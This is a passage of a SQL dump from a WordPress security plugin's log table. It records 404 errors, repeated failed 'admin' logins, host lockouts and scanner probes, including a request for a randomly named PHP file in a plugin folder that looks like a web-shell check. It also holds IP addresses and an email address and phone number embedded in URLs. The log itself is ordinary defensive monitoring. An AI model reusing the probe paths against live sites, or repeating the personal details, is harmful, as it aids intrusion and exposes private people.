(85762, 'four_oh_four', '404 Error', 3, '2018-04-25 15:28:01', '2018-04-25 20:28:01', '188.167.251.19', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85763, 'four_oh_four', '404 Error', 3, '2018-04-25 15:44:06', '2018-04-25 20:44:06', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85764, 'four_oh_four', '404 Error', 3, '2018-04-25 15:50:25', '2018-04-25 20:50:25', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85765, 'four_oh_four', '404 Error', 3, '2018-04-25 16:21:20', '2018-04-25 21:21:20', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85456, 'four_oh_four', '404 Error', 3, '2018-04-23 16:30:24', '2018-04-23 21:30:24', '23.95.222.152', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86622, 'four_oh_four', '404 Error', 3, '2018-04-30 16:35:12', '2018-04-30 21:35:12', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86623, 'four_oh_four', '404 Error', 3, '2018-04-30 16:35:14', '2018-04-30 21:35:14', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86624, 'four_oh_four', '404 Error', 3, '2018-04-30 16:36:01', '2018-04-30 21:36:01', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86625, 'four_oh_four', '404 Error', 3, '2018-04-30 16:41:47', '2018-04-30 21:41:47', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86626, 'four_oh_four', '404 Error', 3, '2018-04-30 16:45:05', '2018-04-30 21:45:05', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86627, 'file_change', 'File Changes Detected', 8, '2018-04-30 16:54:21', '2018-04-30 21:54:21', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:5:"25.43";}'),
(86628, 'four_oh_four', '404 Error', 3, '2018-04-30 17:14:40', '2018-04-30 22:14:40', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86629, 'four_oh_four', '404 Error', 3, '2018-04-30 18:06:52', '2018-04-30 23:06:52', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86630, 'four_oh_four', '404 Error', 3, '2018-04-30 18:07:36', '2018-04-30 23:07:36', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86631, 'four_oh_four', '404 Error', 3, '2018-04-30 18:41:10', '2018-04-30 23:41:10', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86632, 'four_oh_four', '404 Error', 3, '2018-04-30 18:41:55', '2018-04-30 23:41:55', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86633, 'four_oh_four', '404 Error', 3, '2018-04-30 19:01:32', '2018-05-01 00:01:32', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86634, 'four_oh_four', '404 Error', 3, '2018-04-30 19:10:11', '2018-05-01 00:10:11', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86635, 'four_oh_four', '404 Error', 3, '2018-04-30 19:14:08', '2018-05-01 00:14:08', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86636, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:26:11', '2018-05-01 00:26:11', '62.210.71.205', 'admin', 0, '', '', 'a:0:{}'),
(86637, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:26:11', '2018-05-01 00:26:11', '62.210.71.205', 'admin', 0, '', '', 'a:0:{}'),
(86638, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:26:11', '2018-05-01 00:26:11', '62.210.71.205', 'admin', 0, '', '', 'a:0:{}'),
(86639, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:26:11', '2018-05-01 00:26:11', '62.210.71.205', 'admin', 0, '', '', 'a:0:{}'),
(86640, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:26:11', '2018-05-01 00:26:11', '62.210.71.205', 'admin', 0, '', '', 'a:0:{}'),
(86641, 'lockout', 'Host or User Lockout', 10, '2018-04-30 19:26:11', '2018-05-01 00:26:11', '62.210.71.205', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-30 19:41:11";s:11:"expires_gmt";s:19:"2018-05-01 00:41:11";s:4:"type";s:11:"brute_force";}'),
(86642, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:31:19', '2018-05-01 00:31:19', '5.79.83.198', 'admin', 0, '', '', 'a:0:{}'),
(86643, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:31:19', '2018-05-01 00:31:19', '5.79.83.198', 'admin', 0, '', '', 'a:0:{}'),
(86644, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:31:19', '2018-05-01 00:31:19', '5.79.83.198', 'admin', 0, '', '', 'a:0:{}'),
(86645, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:31:19', '2018-05-01 00:31:19', '5.79.83.198', 'admin', 0, '', '', 'a:0:{}'),
(86646, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 19:31:19', '2018-05-01 00:31:19', '5.79.83.198', 'admin', 0, '', '', 'a:0:{}'),
(86647, 'lockout', 'Host or User Lockout', 10, '2018-04-30 19:31:19', '2018-05-01 00:31:19', '5.79.83.198', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-30 19:46:19";s:11:"expires_gmt";s:19:"2018-05-01 00:46:19";s:4:"type";s:11:"brute_force";}'),
(86648, 'four_oh_four', '404 Error', 3, '2018-04-30 20:07:26', '2018-05-01 01:07:26', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86649, 'four_oh_four', '404 Error', 3, '2018-04-30 20:29:30', '2018-05-01 01:29:30', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86650, 'four_oh_four', '404 Error', 3, '2018-04-30 20:39:33', '2018-05-01 01:39:33', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86651, 'four_oh_four', '404 Error', 3, '2018-04-30 21:05:50', '2018-05-01 02:05:50', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86652, 'four_oh_four', '404 Error', 3, '2018-04-30 21:53:12', '2018-05-01 02:53:12', '64.62.252.169', '', 0, '/author/maria/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86653, 'four_oh_four', '404 Error', 3, '2018-04-30 21:56:26', '2018-05-01 02:56:26', '64.62.252.169', '', 0, '/author/hardy/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86654, 'four_oh_four', '404 Error', 3, '2018-04-30 22:00:30', '2018-05-01 03:00:30', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86655, 'four_oh_four', '404 Error', 3, '2018-04-30 22:03:30', '2018-05-01 03:03:30', '64.62.252.169', '', 0, '/author/geri/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86656, 'four_oh_four', '404 Error', 3, '2018-04-30 22:04:15', '2018-05-01 03:04:15', '64.62.252.169', '', 0, '/kupit-diplom-o-vysshem-obrazovanii', '', 'a:1:{s:12:"query_string";s:0:"";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(86657, 'four_oh_four', '404 Error', 3, '2018-04-30 22:04:45', '2018-05-01 03:04:45', '64.62.252.169', '', 0, '/price', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86658, 'four_oh_four', '404 Error', 3, '2018-04-30 22:05:02', '2018-05-01 03:05:02', '64.62.252.169', '', 0, '/contacts', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86659, 'four_oh_four', '404 Error', 3, '2018-04-30 22:08:20', '2018-05-01 03:08:20', '64.62.252.169', '', 0, '/author/howard/4154626692', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86660, 'four_oh_four', '404 Error', 3, '2018-04-30 22:08:37', '2018-05-01 03:08:37', '64.62.252.169', '', 0, '/author/howard/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86661, 'four_oh_four', '404 Error', 3, '2018-04-30 22:08:52', '2018-05-01 03:08:52', '64.62.252.169', '', 0, '/author/howard/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86662, 'four_oh_four', '404 Error', 3, '2018-04-30 22:14:50', '2018-05-01 03:14:50', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86663, 'four_oh_four', '404 Error', 3, '2018-04-30 22:19:55', '2018-05-01 03:19:55', '64.62.252.169', '', 0, '/author/susan/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86664, 'four_oh_four', '404 Error', 3, '2018-04-30 22:20:40', '2018-05-01 03:20:40', '64.62.252.169', '', 0, '/author/claire/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86665, 'four_oh_four', '404 Error', 3, '2018-04-30 22:29:39', '2018-05-01 03:29:39', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86666, 'four_oh_four', '404 Error', 3, '2018-04-30 23:03:53', '2018-05-01 04:03:53', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86667, 'four_oh_four', '404 Error', 3, '2018-04-30 23:06:09', '2018-05-01 04:06:09', '46.109.20.103', '', 0, '/wp-content/plugins/gravityforms/css/preview.css', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86668, 'four_oh_four', '404 Error', 3, '2018-04-30 23:14:12', '2018-05-01 04:14:12', '207.46.13.235', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86669, 'four_oh_four', '404 Error', 3, '2018-04-30 23:19:47', '2018-05-01 04:19:47', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86670, 'four_oh_four', '404 Error', 3, '2018-04-30 23:44:25', '2018-05-01 04:44:25', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86671, 'four_oh_four', '404 Error', 3, '2018-04-30 23:54:49', '2018-05-01 04:54:49', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86672, 'four_oh_four', '404 Error', 3, '2018-04-30 23:54:49', '2018-05-01 04:54:49', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86673, 'four_oh_four', '404 Error', 3, '2018-04-30 23:54:52', '2018-05-01 04:54:52', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86674, 'four_oh_four', '404 Error', 3, '2018-04-30 23:54:53', '2018-05-01 04:54:53', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86675, 'four_oh_four', '404 Error', 3, '2018-05-01 00:36:00', '2018-05-01 05:36:00', '180.76.15.151', '', 0, '/wp-includes/js/mediaelement/\\\\\\\\\\\\\\''+a.scheme+', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86676, 'four_oh_four', '404 Error', 3, '2018-05-01 00:49:43', '2018-05-01 05:49:43', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86677, 'four_oh_four', '404 Error', 3, '2018-05-01 00:50:54', '2018-05-01 05:50:54', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86678, 'four_oh_four', '404 Error', 3, '2018-05-01 00:56:23', '2018-05-01 05:56:23', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86679, 'four_oh_four', '404 Error', 3, '2018-05-01 01:07:52', '2018-05-01 06:07:52', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86680, 'four_oh_four', '404 Error', 3, '2018-05-01 01:08:54', '2018-05-01 06:08:54', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86681, 'four_oh_four', '404 Error', 3, '2018-05-01 01:40:37', '2018-05-01 06:40:37', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86682, 'four_oh_four', '404 Error', 3, '2018-05-01 01:47:40', '2018-05-01 06:47:40', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86683, 'four_oh_four', '404 Error', 3, '2018-05-01 01:51:23', '2018-05-01 06:51:23', '142.252.250.39', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86684, 'four_oh_four', '404 Error', 3, '2018-05-01 01:51:24', '2018-05-01 06:51:24', '142.252.250.39', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86685, 'four_oh_four', '404 Error', 3, '2018-05-01 01:51:27', '2018-05-01 06:51:27', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86686, 'four_oh_four', '404 Error', 3, '2018-05-01 02:13:59', '2018-05-01 07:13:59', '43.241.96.36', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86687, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 02:48:17', '2018-05-01 07:48:17', '185.220.101.13', 'admin', 0, '', '', 'a:0:{}'),
(86688, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 02:48:17', '2018-05-01 07:48:17', '185.220.101.13', 'admin', 0, '', '', 'a:0:{}'),
(86689, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 02:48:17', '2018-05-01 07:48:17', '185.220.101.13', 'admin', 0, '', '', 'a:0:{}'),
(86690, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 02:48:17', '2018-05-01 07:48:17', '185.220.101.13', 'admin', 0, '', '', 'a:0:{}'),
(86691, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 02:48:17', '2018-05-01 07:48:17', '185.220.101.13', 'admin', 0, '', '', 'a:0:{}'),
(86692, 'lockout', 'Host or User Lockout', 10, '2018-05-01 02:48:17', '2018-05-01 07:48:17', '185.220.101.13', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-01 03:03:17";s:11:"expires_gmt";s:19:"2018-05-01 08:03:17";s:4:"type";s:11:"brute_force";}'),
(86693, 'four_oh_four', '404 Error', 3, '2018-05-01 02:50:42', '2018-05-01 07:50:42', '105.233.53.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86694, 'four_oh_four', '404 Error', 3, '2018-05-01 03:10:08', '2018-05-01 08:10:08', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86695, 'four_oh_four', '404 Error', 3, '2018-05-01 03:26:00', '2018-05-01 08:26:00', '216.244.66.234', '', 0, '/author/maria/page/65/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86696, 'four_oh_four', '404 Error', 3, '2018-05-01 03:28:43', '2018-05-01 08:28:43', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86697, 'four_oh_four', '404 Error', 3, '2018-05-01 04:42:19', '2018-05-01 09:42:19', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86698, 'four_oh_four', '404 Error', 3, '2018-05-01 04:53:03', '2018-05-01 09:53:03', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86699, 'four_oh_four', '404 Error', 3, '2018-05-01 04:58:49', '2018-05-01 09:58:49', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86700, 'four_oh_four', '404 Error', 3, '2018-05-01 04:59:03', '2018-05-01 09:59:03', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86701, 'four_oh_four', '404 Error', 3, '2018-05-01 05:00:46', '2018-05-01 10:00:46', '178.17.166.146', '', 0, '/global-belief-relief/QpLbZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86702, 'four_oh_four', '404 Error', 3, '2018-05-01 05:24:07', '2018-05-01 10:24:07', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86703, 'four_oh_four', '404 Error', 3, '2018-05-01 05:25:56', '2018-05-01 10:25:56', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86704, 'four_oh_four', '404 Error', 3, '2018-05-01 05:33:33', '2018-05-01 10:33:33', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86705, 'four_oh_four', '404 Error', 3, '2018-05-01 05:33:34', '2018-05-01 10:33:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86706, 'four_oh_four', '404 Error', 3, '2018-05-01 05:33:36', '2018-05-01 10:33:36', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86707, 'four_oh_four', '404 Error', 3, '2018-05-01 05:33:37', '2018-05-01 10:33:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86708, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86709, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86710, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86711, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86712, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86713, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86714, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', 'admin', 0, '', '', 'a:0:{}'),
(86715, 'lockout', 'Host or User Lockout', 10, '2018-05-01 05:43:11', '2018-05-01 10:43:11', '94.230.208.147', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-01 05:58:11";s:11:"expires_gmt";s:19:"2018-05-01 10:58:11";s:4:"type";s:11:"brute_force";}'),
(86716, 'four_oh_four', '404 Error', 3, '2018-05-01 05:47:27', '2018-05-01 10:47:27', '46.118.155.165', '', 0, '/wp-content/plugins/wp-symposium/server/php/hkvKtwDQjKYzyT.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86717, 'four_oh_four', '404 Error', 3, '2018-05-01 05:53:53', '2018-05-01 10:53:53', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86718, 'four_oh_four', '404 Error', 3, '2018-05-01 06:00:27', '2018-05-01 11:00:27', '93.171.216.141', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86719, 'four_oh_four', '404 Error', 3, '2018-05-01 06:00:28', '2018-05-01 11:00:28', '93.171.216.141', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86720, 'four_oh_four', '404 Error', 3, '2018-05-01 06:16:31', '2018-05-01 11:16:31', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86721, 'four_oh_four', '404 Error', 3, '2018-05-01 06:21:04', '2018-05-01 11:21:04', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86722, 'four_oh_four', '404 Error', 3, '2018-05-01 06:22:09', '2018-05-01 11:22:09', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86723, 'four_oh_four', '404 Error', 3, '2018-05-01 06:36:34', '2018-05-01 11:36:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86724, 'four_oh_four', '404 Error', 3, '2018-05-01 06:36:35', '2018-05-01 11:36:35', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86725, 'four_oh_four', '404 Error', 3, '2018-05-01 06:36:37', '2018-05-01 11:36:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86726, 'four_oh_four', '404 Error', 3, '2018-05-01 06:36:38', '2018-05-01 11:36:38', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86727, 'four_oh_four', '404 Error', 3, '2018-05-01 06:37:50', '2018-05-01 11:37:50', '109.173.20.108', '', 0, '/wp-content/plugins/ready-ecommerce/templates/img/ok-icon.png', 'http://clearyourbeliefs.com/ebook/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86728, 'four_oh_four', '404 Error', 3, '2018-05-01 06:37:50', '2018-05-01 11:37:50', '109.173.20.108', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/ebook/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86729, 'four_oh_four', '404 Error', 3, '2018-05-01 07:12:28', '2018-05-01 12:12:28', '23.95.222.152', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86730, 'four_oh_four', '404 Error', 3, '2018-05-01 07:34:39', '2018-05-01 12:34:39', '103.69.36.84', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86731, 'four_oh_four', '404 Error', 3, '2018-05-01 07:57:07', '2018-05-01 12:57:07', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86732, 'four_oh_four', '404 Error', 3, '2018-05-01 07:57:19', '2018-05-01 12:57:19', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86733, 'four_oh_four', '404 Error', 3, '2018-05-01 07:57:31', '2018-05-01 12:57:31', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86734, 'four_oh_four', '404 Error', 3, '2018-05-01 07:57:43', '2018-05-01 12:57:43', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86735, 'four_oh_four', '404 Error', 3, '2018-05-01 07:57:55', '2018-05-01 12:57:55', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86736, 'four_oh_four', '404 Error', 3, '2018-05-01 07:58:07', '2018-05-01 12:58:07', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86737, 'four_oh_four', '404 Error', 3, '2018-05-01 07:58:19', '2018-05-01 12:58:19', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86738, 'four_oh_four', '404 Error', 3, '2018-05-01 07:58:32', '2018-05-01 12:58:32', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86739, 'four_oh_four', '404 Error', 3, '2018-05-01 07:58:43', '2018-05-01 12:58:43', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86740, 'four_oh_four', '404 Error', 3, '2018-05-01 07:58:56', '2018-05-01 12:58:56', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86741, 'four_oh_four', '404 Error', 3, '2018-05-01 07:59:08', '2018-05-01 12:59:08', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86742, 'four_oh_four', '404 Error', 3, '2018-05-01 07:59:20', '2018-05-01 12:59:20', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86743, 'four_oh_four', '404 Error', 3, '2018-05-01 07:59:32', '2018-05-01 12:59:32', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86744, 'four_oh_four', '404 Error', 3, '2018-05-01 07:59:56', '2018-05-01 12:59:56', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86745, 'four_oh_four', '404 Error', 3, '2018-05-01 08:00:08', '2018-05-01 13:00:08', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86746, 'four_oh_four', '404 Error', 3, '2018-05-01 08:00:20', '2018-05-01 13:00:20', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86747, 'four_oh_four', '404 Error', 3, '2018-05-01 08:00:32', '2018-05-01 13:00:32', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86748, 'four_oh_four', '404 Error', 3, '2018-05-01 08:00:44', '2018-05-01 13:00:44', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86749, 'four_oh_four', '404 Error', 3, '2018-05-01 08:00:56', '2018-05-01 13:00:56', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.org:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86750, 'four_oh_four', '404 Error', 3, '2018-05-01 08:01:08', '2018-05-01 13:01:08', '178.137.87.165', '', 0, '/not_found', 'http://clearyourbeliefs.com:80/not_found', 'a:1:{s:12:"query_string";s:0:"";}'),
(86751, 'lockout', 'Host or User Lockout', 10, '2018-05-01 08:01:08', '2018-05-01 13:01:08', '178.137.87.165', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-01 08:16:08";s:11:"expires_gmt";s:19:"2018-05-01 13:16:08";s:4:"type";s:12:"four_oh_four";}'),
(86752, 'four_oh_four', '404 Error', 3, '2018-05-01 08:44:57', '2018-05-01 13:44:57', '49.146.2.60', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86753, 'four_oh_four', '404 Error', 3, '2018-05-01 08:59:31', '2018-05-01 13:59:31', '94.254.130.125', '', 0, '/wp-content/plugins/ready-ecommerce/templates/img/ok-icon.png', 'http://clearyourbeliefs.com/resources/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86754, 'four_oh_four', '404 Error', 3, '2018-05-01 08:59:31', '2018-05-01 13:59:31', '94.254.130.125', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/resources/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86755, 'four_oh_four', '404 Error', 3, '2018-05-01 09:33:25', '2018-05-01 14:33:25', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
